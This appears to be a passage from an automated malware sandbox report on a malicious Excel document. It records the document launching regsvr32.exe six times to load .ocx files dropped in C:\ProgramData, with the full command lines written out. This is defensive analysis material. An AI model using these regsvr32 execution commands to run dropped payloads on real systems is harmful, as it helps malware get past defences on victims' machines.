                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      Analysis Process: EXCEL.EXE PID: 4324 Parent PID: 744

                                                                                                                                                      General

                                                                                                                                                      Start time:08:31:56
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                      Imagebase:0xa80000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 3672 Parent PID: 4324

                                                                                                                                                      General

                                                                                                                                                      Start time:08:33:26
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 C:\ProgramData\Volet1.ocx
                                                                                                                                                      Imagebase:0xa20000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 1132 Parent PID: 4324

                                                                                                                                                      General

                                                                                                                                                      Start time:08:33:27
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 C:\ProgramData\Volet2.ocx
                                                                                                                                                      Imagebase:0xa20000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 1880 Parent PID: 4324

                                                                                                                                                      General

                                                                                                                                                      Start time:08:33:28
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 C:\ProgramData\Volet3.ocx
                                                                                                                                                      Imagebase:0xa20000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 5836 Parent PID: 4324

                                                                                                                                                      General

                                                                                                                                                      Start time:08:33:28
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
                                                                                                                                                      Imagebase:0xa20000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 5000 Parent PID: 4324

                                                                                                                                                      General

                                                                                                                                                      Start time:08:33:29
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
                                                                                                                                                      Imagebase:0xa20000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 2060 Parent PID: 4324

                                                                                                                                                      General

                                                                                                                                                      Start time:08:33:30
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
                                                                                                                                                      Imagebase:0xa20000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >